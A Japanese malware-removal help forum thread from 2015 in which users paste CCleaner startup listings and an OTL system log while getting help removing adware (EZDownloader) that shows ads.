悪代官の伏魔殿掲示板
検索語:
OR  AND

Re: 広告???
CC win
有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR
有効 HKCU:Run Line LINE Corporation "C:\Program Files\Naver\LINE\Line.exe" --booting
有効 HKLM:Run Apoint Alps Electric Co., Ltd. C:\Program Files\Apoint2K\Apoint.exe
有効 HKLM:Run DispSw NEC Corporation, NEC Personal Products, Ltd. C:\Program Files\DispSw\DispSw.exe
有効 HKLM:Run Google Japanese Input Prelauncher Google Inc. "C:\Program Files\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
有効 HKLM:Run HotKeysCmds Intel Corporation C:\Windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\Windows\system32\igfxtray.exe
有効 HKLM:Run MSC Microsoft Corporation "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
有効 HKLM:Run NECMFK NEC Corporation, NEC Personal Products, Ltd. C:\Program Files\necmfk\necmfk.exe
有効 HKLM:Run Persistence Intel Corporation C:\Windows\system32\igfxpers.exe
有効 HKLM:Run RtHDVCpl Realtek Semiconductor RtHDVCpl.exe
有効 Startup Common クライアントユーティリティー.lnk Logitec Corporation C:\Program Files\Logitec\Common\RaUI.exe
有効 Startup User Dropbox.lnk Dropbox, Inc. C:\Users\USER\AppData\Roaming\Dropbox\bin\Dropbox.exe

CC IE
有効 Extension OneNote に送る Microsoft Corporation C:\Program Files\Microsoft Office\Office15\ONBttnIE.dll
有効 Extension OneNote リンク ノート(K) Microsoft Corporation C:\Program Files\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
無効 Extension クリックで Lync 通話 Microsoft Corporation C:\Program Files\Microsoft Office\Office15\OCHelper.dll
無効 Helper Microsoft SkyDrive Pro Browser Helper Microsoft Corporation C:\PROGRA~1\MICROS~2\Office15\GROOVEEX.DLL
無効 Helper Office Document Cache Handler Microsoft Corporation C:\PROGRA~1\MICROS~2\Office15\URLREDIR.DLL
無効 Helper Skype for Business Browser Helper Microsoft Corporation C:\Program Files\Microsoft Office\Office15\OCHelper.dll

CC Google
有効 App Gmail 8.1 最初のユーザー C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.30 最初のユーザー C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0
有効 App Google ドライブ 6.4 最初のユーザー C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0
有効 App YouTube 4.2.7 最初のユーザー C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0
有効 Extension Auto Refresh Plus 2.0.6 最初のユーザー C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih\2.0.6_0
有効 Extension goo.gl URL Shortener 0.7.8 最初のユーザー C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\iblijlcdoidgdpfknkckljiocdbnlagk\0.7.8_0
有効 Extension Google ドキュメント 0.9 最初のユーザー C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0
有効 Extension sengokuixa-meta-training 1.0.1.0 最初のユーザー C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjcglbbdjlkiecbjgjmbegnmfggagpbh\1.0.1.0_0
有効 Extension sengokuixa-moko 0.5.6.2192 最初のユーザー C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\oofdipfonfajdobnmdidpkckccnbmpfg\0.5.6.2192_0
有効 Extension sengokuixa-Schedule-Khronos 1.0.9.36 最初のユーザー C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfdlclmpabjbfmicjnjihjoenmaplegf\1.0.9.36_0

CC タスクマネージャー
有効 Task Adobe Acrobat Update Task Adobe Systems Incorporated C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task KsafeDelay c:\program files\kingsoft\Kingsoft System Defender\KSafeTray.exe -delayruncheck
有効 Task LaunchPreSignup C:\Program Files\OLBPre\OLBPre.exe signup
有効 Task Microsoft Office 15 Sync Maintenance for TETSUWIN7NOTE-USER TETSUWIN7NOTE Microsoft Corporation C:\Program Files\Microsoft Office\Office15\MsoSync.exe
有効 Task SmartDefrag4_Startup IObit C:\Program Files\IObit\Smart Defrag 4\SmartDefrag.exe /startup
有効 Task SmartDefrag4_Update IObit C:\Program Files\IObit\Smart Defrag 4\AutoUpdate.exe /autorun

御指南頂いた作業後、今のところ広告は出ておりません。
駆除できてればいいのですが・・・ 
  • 2015/05/05 (Tue) 22:51:14
トピックを確認する 
Re: Ezdownloderをインストールしてしまいました。。。。
ご教示ありがとうございます。

OTLのログをお送りします。

OTL logfile created on: 2015/05/05 23:10:57 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\kotaro\Downloads
64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.98 Gb Total Physical Memory | 5.50 Gb Available Physical Memory | 68.86% Memory free
15.96 Gb Paging File | 13.13 Gb Available in Paging File | 82.27% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 1397.17 Gb Total Space | 1029.90 Gb Free Space | 73.71% Space Free | Partition Type: NTFS
Drive D: | 1397.26 Gb Total Space | 1397.12 Gb Free Space | 99.99% Space Free | Partition Type: NTFS
Drive F: | 1863.01 Gb Total Space | 1446.75 Gb Free Space | 77.66% Space Free | Partition Type: NTFS

Computer Name: KOTARO-PC | User Name: kotaro | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/05/05 23:08:41 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\kotaro\Downloads\OTL.exe
PRC - [2014/12/19 08:48:18 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/11/27 13:20:08 | 004,447,744 | ---- | M] (キヤノンマーケティングジャパン株式会社) -- C:\Program Files (x86)\CMJ\CSPTL-CANONMJ\CSPTL-CANONMJ.exe
PRC - [2014/11/27 13:20:08 | 000,007,680 | ---- | M] (キヤノンマーケティングジャパン株式会社) -- C:\Program Files (x86)\CMJ\CSPTL-CANONMJ\CSPTL-CANONMJService.exe
PRC - [2014/06/22 11:46:49 | 001,141,848 | ---- | M] (RealNetworks, Inc.) -- c:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe
PRC - [2014/06/22 11:46:47 | 000,296,520 | ---- | M] (RealNetworks, Inc.) -- C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe
PRC - [2014/06/10 22:03:38 | 000,023,552 | ---- | M] () -- C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
PRC - [2014/06/10 17:50:38 | 000,039,568 | ---- | M] () -- C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
PRC - [2013/08/05 16:49:42 | 000,111,576 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
PRC - [2013/02/19 16:38:58 | 000,453,736 | ---- | M] (CANON INC.) -- C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
PRC - [2012/05/15 02:21:40 | 000,382,272 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
PRC - [2012/03/28 21:49:11 | 000,140,456 | ---- | M] () -- C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
PRC - [2011/04/22 17:28:46 | 001,081,344 | ---- | M] (PFU LIMITED) -- C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe
PRC - [2011/03/31 11:53:58 | 000,230,776 | ---- | M] (BUFFALO INC.) -- C:\Program Files (x86)\BUFFALO\WDTool\bwdbackground.exe
PRC - [2010/11/05 10:16:12 | 005,216,624 | ---- | M] (appsmaker) -- C:\Program Files (x86)\Common Files\OptimalSuite Common\AMDSrv.exe
PRC - [2010/08/20 09:57:06 | 000,107,816 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe
PRC - [2010/04/27 10:09:52 | 000,113,288 | ---- | M] (Renesas Electronics Corporation) -- C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
PRC - [2010/03/10 14:26:48 | 000,189,728 | ---- | M] (Protexis Inc.) -- c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
PRC - [2009/11/10 14:24:22 | 000,105,632 | ---- | M] (Corel) -- C:\Program Files (x86)\Common Files\Corel\Standby\Standby.exe
PRC - [2009/11/10 14:15:34 | 000,443,552 | ---- | M] (Corel) -- c:\Program Files (x86)\Corel\Corel Digital Studio 2010\Gadget.exe
PRC - [2009/09/30 10:07:34 | 000,086,016 | ---- | M] (PFU LIMITED) -- C:\Windows\SSDriver\fi5110\SsWiaChecker.exe
PRC - [2009/07/09 10:18:24 | 000,126,328 | ---- | M] (BUFFALO INC.) -- C:\Program Files (x86)\BUFFALO\clientmgrv\bin\BWH32S.exe
PRC - [2009/06/19 16:12:18 | 000,068,120 | ---- | M] (Texim Corporation.) -- C:\Program Files (x86)\Texim\ExBackup\TxHDDSvc.exe
PRC - [2009/04/15 23:52:06 | 000,091,432 | ---- | M] (CyberLink Corp.) -- C:\Program Files (x86)\CyberLink\PowerDVD8\PDVD8Serv.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]

MOD - [2015/04/16 06:58:03 | 000,805,376 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\19a83775eaa7f4de4c162a44d63f55bd\System.Runtime.Remoting.ni.dll
MOD - [2014/11/27 13:20:08 | 000,035,328 | ---- | M] () -- C:\Program Files (x86)\CMJ\CSPTL-CANONMJ\CSPTL-USBDELECT.dll
MOD - [2014/10/19 09:17:52 | 000,399,872 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\7ab3e68c2e523f60bfc4f222cbd1c1d0\System.Xml.Linq.ni.dll
MOD - [2014/10/19 08:10:32 | 000,368,128 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\7b22741531a2850c807656d0298a96bd\PresentationFramework.Aero.ni.dll
MOD - [2014/10/19 08:09:55 | 014,340,096 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\1f539baa94516139240877cb6afd72c2\PresentationFramework.ni.dll
MOD - [2014/10/19 08:09:45 | 012,435,968 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\1453d9e9a4989833ef3db4b22549ba1a\System.Windows.Forms.ni.dll
MOD - [2014/10/19 08:09:41 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\836e10dfd0811b303553216f5cb092ef\System.Drawing.ni.dll
MOD - [2014/10/19 08:09:37 | 005,467,648 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\d49908aa93a23c84847b1f8b1b667860\System.Xml.ni.dll
MOD - [2014/10/19 08:09:35 | 000,978,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\237d509a79aeef6e4635b09450d98f2a\System.Configuration.ni.dll
MOD - [2014/10/19 08:09:33 | 012,236,800 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationCore\3d4f835b8078dacc8d5da623e2c3f0ee\PresentationCore.ni.dll
MOD - [2014/10/19 08:09:27 | 003,348,480 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\d97a5aa0eb7697aca7c6e90ae471af2b\WindowsBase.ni.dll
MOD - [2014/10/19 08:09:25 | 007,991,808 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\908ba9e296e92b4e14bdc2437edac603\System.ni.dll
MOD - [2014/10/18 07:38:44 | 012,894,208 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\db563d596d76daed04e9b5d25b2f4cb9\System.Windows.Forms.ni.dll
MOD - [2014/10/18 07:38:42 | 007,668,736 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7147fa233a070283dba824da40089bf1\System.Xml.ni.dll
MOD - [2014/10/18 07:38:42 | 006,990,336 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\691c1ad89d16f49d80e84fa06a79089a\System.Core.ni.dll
MOD - [2014/10/18 07:38:38 | 001,644,544 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\b4c08872c259018b17b2801da33ac80f\System.Drawing.ni.dll
MOD - [2014/10/18 07:38:38 | 000,976,384 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\0648dbecb7e3fb9523565107e04a5caf\System.Configuration.ni.dll
MOD - [2014/10/18 07:38:37 | 010,100,736 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\17a393b77ae757f0768501fb95ff5af6\System.ni.dll
MOD - [2014/09/12 03:39:01 | 011,497,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
MOD - [2014/02/28 07:32:53 | 016,953,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\ce5f61c5754789df97be8dc991c47d07\mscorlib.ni.dll
MOD - [2013/08/05 15:48:08 | 000,016,856 | ---- | M] () -- C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
MOD - [2011/04/09 17:45:02 | 000,034,816 | ---- | M] () -- C:\Program Files (x86)\Google\Google Desktop Search\gzlib.dll
MOD - [2011/04/08 13:53:48 | 000,376,832 | ---- | M] () -- C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsConfig.dll
MOD - [2011/03/16 15:30:58 | 000,233,472 | ---- | M] () -- C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsExtention.dll
MOD - [2010/11/13 09:00:19 | 000,348,160 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_ja_b77a5c561934e089\mscorlib.resources.dll
MOD - [2010/08/24 16:56:50 | 000,167,936 | ---- | M] () -- C:\Program Files (x86)\PFU\ScanSnap\Driver\SSsltsa.dll
MOD - [2010/08/20 09:57:06 | 000,619,816 | ---- | M] () -- C:\Program Files (x86)\CyberLink\Power2Go\CLMediaLibrary.dll
MOD - [2010/08/20 09:57:00 | 000,013,096 | ---- | M] () -- C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvcPS.dll
MOD - [2009/11/10 14:24:54 | 000,201,888 | ---- | M] () -- c:\Program Files (x86)\Corel\Corel Digital Studio 2010\WinShell.dll
MOD - [2009/11/10 14:19:34 | 000,087,200 | ---- | M] () -- c:\Program Files (x86)\Corel\Corel Digital Studio 2010\GoldenGateCore.dll
MOD - [2009/07/14 19:48:52 | 000,118,784 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\PresentationCore.resources\3.0.0.0_ja_31bf3856ad364e35\PresentationCore.resources.dll
MOD - [2007/02/23 13:31:20 | 000,053,248 | ---- | M] () -- C:\Program Files (x86)\PFU\ScanSnap\Driver\SSSLTSA0411.dll
MOD - [2003/03/26 18:46:36 | 000,135,168 | ---- | M] () -- C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsImgIO.dll


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - File not found [Auto | Running] -- C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe coreFrameworkHost.exe -- (Amsp)
SRV:[b]64bit:[/b] - [2015/03/13 12:54:00 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:[b]64bit:[/b] - [2014/07/21 04:05:05 | 001,187,376 | ---- | M] (Trend Micro Inc.) [Auto | Running] -- C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe -- (Platinum Host Service)
SRV:[b]64bit:[/b] - [2013/05/27 14:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:[b]64bit:[/b] - [2012/04/24 18:43:49 | 000,390,632 | ---- | M] () [Auto | Running] -- C:\Program Files\CyberLink\Shared files\RichVideo64.exe -- (RichVideo64)
SRV:[b]64bit:[/b] - [2011/06/21 18:57:42 | 000,341,296 | ---- | M] (Nitro PDF Software) [Auto | Running] -- C:\Program Files\Common Files\Nitro PDF\Reader\2.0\NitroPDFReaderDriverService2x64.exe -- (NitroReaderDriverReadSpool2)
SRV:[b]64bit:[/b] - [2010/09/22 18:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV - [2015/04/24 18:55:02 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/04/18 16:03:05 | 000,268,464 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/12/19 08:48:18 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/11/27 13:20:08 | 000,007,680 | ---- | M] (キヤノンマーケティングジャパン株式会社) [Auto | Running] -- C:\Program Files (x86)\CMJ\CSPTL-CANONMJ\CSPTL-CANONMJService.exe -- (CSPTL-CANONMJService)
SRV - [2014/06/22 11:46:49 | 001,141,848 | ---- | M] (RealNetworks, Inc.) [Auto | Running] -- c:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe -- (RealPlayer Cloud Service)
SRV - [2014/06/10 22:03:38 | 000,023,552 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe -- (RealPlayerUpdateSvc)
SRV - [2014/06/10 17:50:38 | 000,039,568 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe -- (RealNetworks Downloader Resolver Service)
SRV - [2014/03/21 07:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2012/05/15 19:48:00 | 001,262,400 | ---- | M] (NVIDIA Corporation) [Auto | Stopped] -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2012/05/15 02:21:40 | 000,382,272 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service)
SRV - [2012/03/28 21:49:11 | 000,140,456 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe -- (IJPLMSVC)
SRV - [2011/03/31 11:53:58 | 000,230,776 | ---- | M] (BUFFALO INC.) [Auto | Running] -- C:\Program Files (x86)\BUFFALO\WDTool\bwdbackground.exe -- (WirelessDiagnosis)
SRV - [2010/11/09 11:07:44 | 000,246,256 | ---- | M] (CyberLink) [Auto | Stopped] -- C:\Program Files (x86)\CyberLink\PowerProducer\BDSDK\NavFilter\kmsvc.exe -- (CLKMSVC10_90970B6B)
SRV - [2010/11/05 10:16:12 | 005,216,624 | ---- | M] (appsmaker) [Auto | Running] -- C:\Program Files (x86)\Common Files\OptimalSuite Common\AMDSrv.exe -- (AMOptimalDiskService)
SRV - [2010/07/28 11:51:08 | 000,116,064 | ---- | M] (Sony Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Sony Shared\AVLib\PACSPTISVR.exe -- (PACSPTISVR)
SRV - [2010/03/10 14:26:48 | 000,189,728 | ---- | M] (Protexis Inc.) [Auto | Running] -- c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe -- (PSI_SVC_2)
SRV - [2009/07/09 10:18:24 | 000,126,328 | ---- | M] (BUFFALO INC.) [Auto | Running] -- C:\Program Files (x86)\BUFFALO\clientmgrv\bin\BWH32S.exe -- (BWH32S)
SRV - [2009/06/19 16:12:18 | 000,068,120 | ---- | M] (Texim Corporation.) [Auto | Running] -- C:\Program Files (x86)\Texim\ExBackup\TxHDDSvc.exe -- (TeximTxHDDSvc)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2014/07/14 16:39:46 | 000,121,944 | ---- | M] (Trend Micro Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\tmactmon.sys -- (tmactmon)
DRV:[b]64bit:[/b] - [2014/07/14 16:39:42 | 000,093,664 | ---- | M] (Trend Micro Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\tmevtmgr.sys -- (tmevtmgr)
DRV:[b]64bit:[/b] - [2014/07/14 16:39:36 | 000,305,832 | ---- | M] (Trend Micro Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\tmcomm.sys -- (tmcomm)
DRV:[b]64bit:[/b] - [2014/07/10 01:02:55 | 000,106,296 | ---- | M] (Trend Micro Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\tmeevw.sys -- (tmeevw)
DRV:[b]64bit:[/b] - [2014/06/30 20:06:54 | 000,106,296 | ---- | M] (Trend Micro Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\tmusa.sys -- (tmusa)
DRV:[b]64bit:[/b] - [2013/07/25 16:53:46 | 000,023,040 | ---- | M] (Apple Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netaapl64.sys -- (Netaapl)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/04/19 02:08:03 | 000,188,736 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvhda64v.sys -- (NVHDA)
DRV:[b]64bit:[/b] - [2012/03/01 15:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2011/07/18 18:58:05 | 000,055,280 | ---- | M] (Sonic Solutions) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\PxHlpa64.sys -- (PxHlpa64)
DRV:[b]64bit:[/b] - [2011/04/21 18:08:08 | 000,036,696 | ---- | M] (Grass Valley K.K.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\cdrblock.sys -- (cdrblock)
DRV:[b]64bit:[/b] - [2011/03/11 15:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2011/03/11 15:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2011/01/20 18:05:42 | 000,408,680 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:[b]64bit:[/b] - [2010/11/20 22:34:02 | 000,360,832 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\vpcvmm.sys -- (vpcvmm)
DRV:[b]64bit:[/b] - [2010/11/20 22:34:02 | 000,194,944 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vpchbus.sys -- (vpcbus)
DRV:[b]64bit:[/b] - [2010/11/20 22:33:35 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2010/11/20 20:35:32 | 000,095,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vpcusb.sys -- (vpcusb)
DRV:[b]64bit:[/b] - [2010/11/20 20:35:20 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\vpcnfltr.sys -- (vpcnfltr)
DRV:[b]64bit:[/b] - [2010/11/20 20:07:05 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2010/09/23 00:36:48 | 000,048,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fssfltr.sys -- (fssfltr)
DRV:[b]64bit:[/b] - [2010/09/21 18:59:38 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2010/07/27 09:45:46 | 000,180,224 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3xhc.sys -- (nusb3xhc)
DRV:[b]64bit:[/b] - [2010/07/27 09:45:46 | 000,078,848 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3hub.sys -- (nusb3hub)
DRV:[b]64bit:[/b] - [2010/07/05 16:40:46 | 000,018,944 | ---- | M] (BUFFALO INC.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bufeap64.sys -- (Bufeap)
DRV:[b]64bit:[/b] - [2009/11/18 08:12:00 | 000,032,344 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\MBfilt64.sys -- (MBfilt)
DRV:[b]64bit:[/b] - [2009/09/15 19:45:32 | 000,216,448 | ---- | M] (NEC AccessTechnica, Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\drxvi314_64.sys -- (bcm)
DRV:[b]64bit:[/b] - [2009/08/05 21:59:48 | 000,987,648 | ---- | M] (Ralink Technology Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ucgnstax.sys -- (ucgnsta)
DRV:[b]64bit:[/b] - [2009/07/14 10:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2009/07/14 10:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2009/07/14 10:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
